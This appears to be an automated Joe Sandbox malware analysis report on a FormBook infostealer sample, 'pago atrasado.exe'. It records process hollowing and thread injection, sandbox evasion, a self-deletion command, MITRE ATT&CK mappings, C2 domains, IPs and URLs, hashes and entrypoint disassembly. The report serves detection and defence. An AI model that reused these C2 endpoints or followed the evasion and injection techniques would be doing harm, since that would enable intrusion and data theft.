          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A037F5 mov eax, dword ptr fs:[00000030h]1_2_00A037F5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EF716 mov eax, dword ptr fs:[00000030h]1_2_009EF716
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA70E mov eax, dword ptr fs:[00000030h]1_2_009FA70E
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA70E mov eax, dword ptr fs:[00000030h]1_2_009FA70E
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9070D mov eax, dword ptr fs:[00000030h]1_2_00A9070D
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9070D mov eax, dword ptr fs:[00000030h]1_2_00A9070D
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FE730 mov eax, dword ptr fs:[00000030h]1_2_009FE730
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C4F2E mov eax, dword ptr fs:[00000030h]1_2_009C4F2E
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C4F2E mov eax, dword ptr fs:[00000030h]1_2_009C4F2E
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5FF10 mov eax, dword ptr fs:[00000030h]1_2_00A5FF10
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5FF10 mov eax, dword ptr fs:[00000030h]1_2_00A5FF10
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98F6A mov eax, dword ptr fs:[00000030h]1_2_00A98F6A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DEF40 mov eax, dword ptr fs:[00000030h]1_2_009DEF40
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DFF60 mov eax, dword ptr fs:[00000030h]1_2_009DFF60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04550050 mov eax, dword ptr fs:[00000030h]16_2_04550050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04550050 mov eax, dword ptr fs:[00000030h]16_2_04550050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CC450 mov eax, dword ptr fs:[00000030h]16_2_045CC450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CC450 mov eax, dword ptr fs:[00000030h]16_2_045CC450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04601074 mov eax, dword ptr fs:[00000030h]16_2_04601074
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A44B mov eax, dword ptr fs:[00000030h]16_2_0456A44B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F2073 mov eax, dword ptr fs:[00000030h]16_2_045F2073
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455746D mov eax, dword ptr fs:[00000030h]16_2_0455746D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h]16_2_045B7016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h]16_2_045B7016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h]16_2_045B7016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]16_2_045B6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]16_2_045B6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]16_2_045B6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]16_2_045B6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460740D mov eax, dword ptr fs:[00000030h]16_2_0460740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460740D mov eax, dword ptr fs:[00000030h]16_2_0460740D
          Source: C:\Users\user\Desktop\pago atrasado.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00409B30 LdrLoadDll
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_10009B50 SetUnhandledExceptionFilter,UnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\pago atrasado.exe | Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\pago atrasado.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\pago atrasado.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\pago atrasado.exe | Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\pago atrasado.exe | Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\pago atrasado.exe | Memory written: C:\Users\user\Desktop\pago atrasado.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\pago atrasado.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\pago atrasado.exe | Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\pago atrasado.exe | Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\colorcpl.exe | Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\pago atrasado.exe | Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: explorer.exe, 00000002.00000000.275805694.00000000089FF000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000000.281510605.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_100098CF cpuid
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_10012E00 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Valid Accounts | Shared Modules 1 | Application Shimming 1 | Process Injection 612 | Virtualization/Sandbox Evasion 2 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1 |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Application Shimming 1 | Process Injection 612 | LSASS Memory | Security Software Discovery 151 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 11 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 114 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |

          Behavior Graph

          [Behavior graph image not reproduced. Behavior Graph ID: 502137; Sample: pago atrasado.exe; Startdate: 13/10/2021; Architecture: WINDOWS; Score: 100]

          Process chain and signatures shown in the graph:

          • Sample-level DNS/IP: www.shopthatlookboutique.com, www.christinegagnonjewellery.com, shops.myshopify.com. Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures.
          • pago atrasado.exe (started): dropped C:\Users\user\AppData\Local\...\xpbpx.dll, PE32. Signature: Injects a PE file into a foreign processes.
          • pago atrasado.exe (started by the above). Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection).
          • explorer.exe (injected). DNS/IP: www.itskosi.com; www.crisisinterventionadvocates.com 74.208.236.134, 49793, 80 ONEANDONE-ASBrauerstrasse48DE United States; 10 other IPs or domains. Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation.
          • colorcpl.exe (started by explorer.exe). Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements.
          • cmd.exe (started by colorcpl.exe).
          • conhost.exe (started by cmd.exe).

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| pago atrasado.exe | 100% | Joe Sandbox ML | | |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

| Source | Detection | Scanner | Label |
| --- | --- | --- | --- |
| 0.2.pago atrasado.exe.2330000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 1.0.pago atrasado.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366 |
| 0.0.pago atrasado.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366 |
| 16.2.colorcpl.exe.4a4796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen |
| 16.2.colorcpl.exe.2b2c88.1.unpack | 100% | Avira | TR/Patched.Ren.Gen |
| 1.2.pago atrasado.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 1.1.pago atrasado.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 0.2.pago atrasado.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366 |

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| www.everythangbutwhite.com | 3.64.163.50 | true | true | | unknown |
| oddanimalsink.com | 34.102.136.180 | true | false | | unknown |
| www.highvizpeople.com | 208.91.197.27 | true | true | | unknown |
| www.itskosi.com | 46.101.121.244 | true | true | | unknown |
| www.crisisinterventionadvocates.com | 74.208.236.134 | true | true | | unknown |
| shops.myshopify.com | 23.227.38.74 | true | false | | unknown |
| www.baybeg.com | unknown | unknown | true | | unknown |
| www.shopthatlookboutique.com | unknown | unknown | true | | unknown |
| www.christinegagnonjewellery.com | unknown | unknown | true | | unknown |
| www.ttemola.com | unknown | unknown | true | | unknown |
| www.oddanimalsink.com | unknown | unknown | true | | unknown |
| www.ishhs.xyz | unknown | unknown | true | | unknown |
| www.sfcn-dng.com | unknown | unknown | true | | unknown |
| www.umgaleloacademy.com | unknown | unknown | true | | unknown |

                                      Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| www.crisisinterventionadvocates.com/u9xn/ | true | Avira URL Cloud: safe | low |
| http://www.oddanimalsink.com/u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo | false | Avira URL Cloud: safe | unknown |
| http://www.crisisinterventionadvocates.com/u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo | true | Avira URL Cloud: safe | unknown |
| http://www.itskosi.com/u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo | true | Avira URL Cloud: safe | unknown |
| http://www.everythangbutwhite.com/u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo | true | Avira URL Cloud: safe | unknown |
| http://www.highvizpeople.com/u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo | true | Avira URL Cloud: safe | unknown |

                                      URLs from Memory and Binaries


                                          Contacted IPs

                                          Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 208.91.197.27 | www.highvizpeople.com | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true |
| 34.102.136.180 | oddanimalsink.com | United States | 15169 | GOOGLEUS | false |
| 3.64.163.50 | www.everythangbutwhite.com | United States | 16509 | AMAZON-02US | true |
| 46.101.121.244 | www.itskosi.com | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true |
| 74.208.236.134 | www.crisisinterventionadvocates.com | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | true |

                                          General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 502137
Start date: 13.10.2021
Start time: 16:42:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 17s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: pago atrasado.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/2@12/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 31.4% (good quality ratio 28.7%)
• Quality average: 76.5%
• Quality standard deviation: 31.3%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 106
• Number of non-executed functions: 77
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 95.100.218.79, 95.100.216.89, 20.50.102.62, 40.112.88.60, 2.20.178.33, 2.20.178.24, 20.82.209.104
                                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                          • Not all processes were analyzed; the report is missing behavior information
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/502137/sample/pago atrasado.exe

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs


                                          Domains


                                          ASN


                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll
                                          Process:C:\Users\user\Desktop\pago atrasado.exe
                                          File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):6.395766788929115
                                          Encrypted:false
                                          SSDEEP:1536:oJUmgGAYhReTNsu0yGLmQEQoOoLz8I5EgZ2UlH08mAiI3Wklk9ncobUfsQzt2jwM:CUmgGASei2EAPP3xlkrEmP
                                          MD5:4EB0E08649F542FD0E44BEF7845956FC
                                          SHA1:5FAC196EE8AF08F8F954F3086C0250A905986C02
                                          SHA-256:15ED84B6D171B6B6834AA6A39150B6165B2C83411929A8C6963B6E446DF44ED1
                                          SHA-512:DE809B359CCD7B65B41FD8320A16793C74AE1EECFEE3F25D8A9943CA4D2CDA675733794EC944E11D62FCD0F6AD9A0BFD7748E74841C68C6796255235B3D0B68F
                                          Malicious:false
                                          Reputation:low
                                          C:\Users\user\AppData\Local\Temp\upukqvxhfh
                                          Process:C:\Users\user\Desktop\pago atrasado.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):215137
                                          Entropy (8bit):7.991819771185154
                                          Encrypted:true
                                          SSDEEP:6144:eLTysZ+qYT8Em3yAwsDPmM2cPwQd/crz4wEvdt4:symYT8ayeQdUr8wEE
                                          MD5:34564360F76F9665C311E080E6C1CECC
                                          SHA1:87119F439AC4DF6D9FB59DA568218EBFCAF88981
                                          SHA-256:1AB4C2718912B5BF3137E94135F07CA6665B788448429D15C4AE04E6DF3FF8B1
                                          SHA-512:3410542C5ED5F5EC44521001E29201B535486B9FD843186827EDA99C2F739B78DDEE99070E74AACB770F61BA48EE18629BBB73D691E0DB567DE0702017D6EB77
                                          Malicious:false
                                          Reputation:low

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.9390817972262315
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:pago atrasado.exe
                                          File size:288183
                                          MD5:f841c72b1c4cadc4c98903ad26a96a16
                                          SHA1:06359aaf42a5ce60889ab7a93d8af7702b34630a
                                          SHA256:eaa038a0020fee7ddfe2919203f20f15ca1d7eb19d90b168cade93b5cf8d7f43
                                          SHA512:b80671d608aab3309567326b552a969245e448cd272e635a74abde9082d455e11f9d264928c61647d4b52b183c85425d3933fcffa4093b4453463e295f768f37
                                          SSDEEP:6144:wBlL/cQMpuMEI8xf6S6s4SOTJoR6qMdayJ5rSFb1e7uuUI0vVLM:CeQMzEDxf6I8J3dTXuuUbI

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint:0x4030fb
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:b76363e9cb88bf9390860da8e50999d2

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 00000184h
                                          push ebx
                                          push ebp
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+20h], ebx
                                          mov dword ptr [esp+14h], 00409168h
                                          mov dword ptr [esp+1Ch], ebx
                                          mov byte ptr [esp+18h], 00000020h
                                          call dword ptr [004070B0h]
                                          call dword ptr [004070ACh]
                                          cmp ax, 00000006h
                                          je 00007F34348B3B53h
                                          push ebx
                                          call 00007F34348B6934h
                                          cmp eax, ebx
                                          je 00007F34348B3B49h
                                          push 00000C00h
                                          call eax
                                          mov esi, 00407280h
                                          push esi
                                          call 00007F34348B68B0h
                                          push esi
                                          call dword ptr [00407108h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], bl
                                          jne 00007F34348B3B2Dh
                                          push 0000000Dh
                                          call 00007F34348B6908h
                                          push 0000000Bh
                                          call 00007F34348B6901h
                                          mov dword ptr [00423F44h], eax
                                          call dword ptr [00407038h]
                                          push ebx
                                          call dword ptr [0040726Ch]
                                          mov dword ptr [00423FF8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 0041F4F0h
                                          call dword ptr [0040715Ch]
                                          push 0040915Ch
                                          push 00423740h
                                          call 00007F34348B6534h
                                          call dword ptr [0040710Ch]
                                          mov ebp, 0042A000h
                                          push eax
                                          push ebp
                                          call 00007F34348B6522h
                                          push ebx
                                          call dword ptr [00407144h]

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          Name | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7418 | 0xa0 | .rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0x9e0 | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                          Sections

                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                          .text | 0x1000 | 0x5aeb | 0x5c00 | False | 0.665123980978 | data | 6.42230569414 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata | 0x7000 | 0x1196 | 0x1200 | False | 0.458984375 | data | 5.20291736659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data | 0x9000 | 0x1b038 | 0x600 | False | 0.432291666667 | data | 4.0475118296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc | 0x2d000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.50948350161 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          Name | RVA | Size | Type | Language | Country
                                          RT_ICON | 0x2d190 | 0x2e8 | data | English | United States
                                          RT_DIALOG | 0x2d478 | 0x100 | data | English | United States
                                          RT_DIALOG | 0x2d578 | 0x11c | data | English | United States
                                          RT_DIALOG | 0x2d698 | 0x60 | data | English | United States
                                          RT_GROUP_ICON | 0x2d6f8 | 0x14 | data | English | United States
                                          RT_MANIFEST | 0x2d710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                          Imports

                                          DLL | Import
